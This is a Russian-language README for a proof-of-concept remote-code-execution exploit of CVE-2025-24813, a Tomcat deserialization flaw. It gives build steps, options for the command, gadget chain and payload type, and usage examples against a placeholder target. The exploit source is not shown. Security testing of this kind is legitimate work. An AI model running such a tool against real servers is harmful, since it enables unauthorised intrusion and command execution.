
Эксплойт для подтверждения концепции (PoC) для CVE-2025-24813, уязвимости десериализации Java в Apache Tomcat. Генерирует вредоносные сериализованные полезные нагрузки и загружает их в виде файлов сеансов для выполнения удаленного кода.
Этот репозиторий содержит proof-of-concept эксплойт для CVE-2025-24813, уязвимости десериализации Java в Apache Tomcat.
Основано на absholi7ly/POC-CVE-2025-24813/.
Установка зависимостей:
uv venv
source .venv/bin/activate
uv sync
Загрузка ysoserial:
./download.sh
Сборка и запуск эксплойта в контейнере:
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>
Запуск эксплойта напрямую:
python main.py <target_url> [options]
--command: Команда для выполнения (по умолчанию: calc.exe)--ysoserial: Путь к ysoserial.jar (по умолчанию: ./ysoserial-all.jar)--gadget: Цепочка гаджетов ysoserial (по умолчанию: CommonsCollections6)--payload_type: Тип полезной нагрузки — ysoserial или java (по умолчанию: ysoserial)--no-ssl-verify: Отключить проверку SSL# Базовое использование
python main.py http://target:8080
# Пользовательская команда
python main.py http://target:8080 --command "whoami"
# Использование Java-полезной нагрузки вместо ysoserial
python main.py http://target:8080 --payload_type java
Этот инструмент предназначен только для образовательного тестирования и тестирования с разрешения. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.